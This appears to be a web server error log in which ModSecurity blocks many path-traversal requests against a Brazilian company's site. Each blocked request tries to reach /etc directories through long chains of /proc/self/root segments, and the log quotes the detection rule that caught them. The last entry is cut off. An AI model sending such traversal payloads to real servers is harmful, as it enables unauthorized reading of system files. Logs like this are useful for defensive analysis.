[Mon Mar 16 14:12:27.472836 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.241.46:41394] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5-1ajLEzk2WiQ-10Z8gAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:28.735568 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.241.46:42978] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5_NSswJuvopo3lOhnKQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:29.507300 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.243.203:56998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5_bABkC4fWIHEf8H22wAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:12:31.116887 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:42994] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg5_6QpVkWug9HeOt89RwAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:32.518615 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.241.46:43006] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6AJqj1wV0Si-Okef22QAAABA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:33.722331 2026] [:error] [pid 11972:tid 140411674785536] [client 74.7.241.46:43014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6AZqj1wV0Si-Okef22gAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:35.055894 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:43018] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6A1ajLEzk2WiQ-10Z9AAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:36.331230 2026] [:error] [pid 10772:tid 140411574073088] [client 74.7.241.46:43020] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6BP9ocpUE4ed4uDz4FQAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:37.636577 2026] [:error] [pid 10772:tid 140411683178240] [client 74.7.241.46:43022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6Bf9ocpUE4ed4uDz4FgAAAgc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:38.851666 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.241.46:33276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6BtSswJuvopo3lOhnKgAAAJQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:40.195829 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.241.46:33280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6CKQpVkWug9HeOt89SAAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:42.417336 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:33292] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6CrABkC4fWIHEf8H23gAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:43.747036 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:33294] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6C3jZBu2q05ozVU9g5wAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:44.922322 2026] [:error] [pid 21805:tid 140411658000128] [client 74.7.241.46:33310] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6DLABkC4fWIHEf8H23wAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:46.195270 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:33320] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6DrABkC4fWIHEf8H24QAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:47.627079 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:55560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6D7ysWC90G-1nBrBMywAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:12:48.446648 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:33328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6EHjZBu2q05ozVU9g6QAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:12:54.339524 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.243.203:43864] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6FqQpVkWug9HeOt89UAAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:02.200728 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:46484] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6HqTCbgAP5jq5Tegy7QAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:02.591509 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.241.46:36738] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6HtSswJuvopo3lOhnOAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:13:04.526442 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:56210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg6ILysWC90G-1nBrBMzQAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:13:11.321055 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:56216] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 